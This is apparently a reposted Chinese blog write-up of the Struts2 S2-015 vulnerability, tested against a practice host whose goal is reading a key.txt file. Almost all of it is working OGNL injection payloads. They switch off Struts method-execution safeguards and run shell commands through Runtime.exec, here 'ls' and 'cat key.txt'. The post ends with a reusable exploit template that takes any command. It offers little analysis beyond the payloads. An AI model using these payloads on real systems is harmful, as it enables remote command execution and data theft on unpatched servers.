【Struts2-命令-代码执行突破分析系列】S2-015

时间：2020-04-16 15:34:26 阅读：152 评论：0 收藏：0 [点我收藏+]

标签：oda 图片 pac run txt data rip lang upload

测试漏洞

http://219.153.49.228:45828/${1+2}.action

表达式进行了计算，表示漏洞存在，开始构造exp

读取当前文件夹的文件

${#context[‘xwork.MethodAccessor.denyMethodExecution‘]=false,#m=#_memberAccess.getClass().getDeclaredField(‘allowStaticMethodAccess‘),#m.setAccessible(true),#m.set(#_memberAccess,true),#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(‘ls‘).getInputStream()),#q}.action

读取key.txt

${#context[‘xwork.MethodAccessor.denyMethodExecution‘]=false,#m=#_memberAccess.getClass().getDeclaredField(‘allowStaticMethodAccess‘),#m.setAccessible(true),#m.set(#_memberAccess,true),#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(‘cat key.txt‘).getInputStream()),#q}.action

Exp代码：

${#context[‘xwork.MethodAccessor.denyMethodExecution‘]=false,#m=#_memberAccess.getClass().getDeclaredField(‘allowStaticMethodAccess‘),#m.setAccessible(true),#m.set(#_memberAccess,true),#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(‘[命令]‘).getInputStream()),#q}.action

【Struts2-命令-代码执行突破分析系列】S2-015

标签：oda 图片 pac run txt data rip lang upload

原文地址：https://www.cnblogs.com/ssan/p/12712695.html

踩

(0)

评论一句话评论（0）

分享档案

更多>

2021年07月29日 (22)
2021年07月28日 (40)
2021年07月27日 (32)
2021年07月26日 (79)
2021年07月23日 (29)
2021年07月22日 (30)
2021年07月21日 (42)
2021年07月20日 (16)
2021年07月19日 (90)
2021年07月16日 (35)

周排行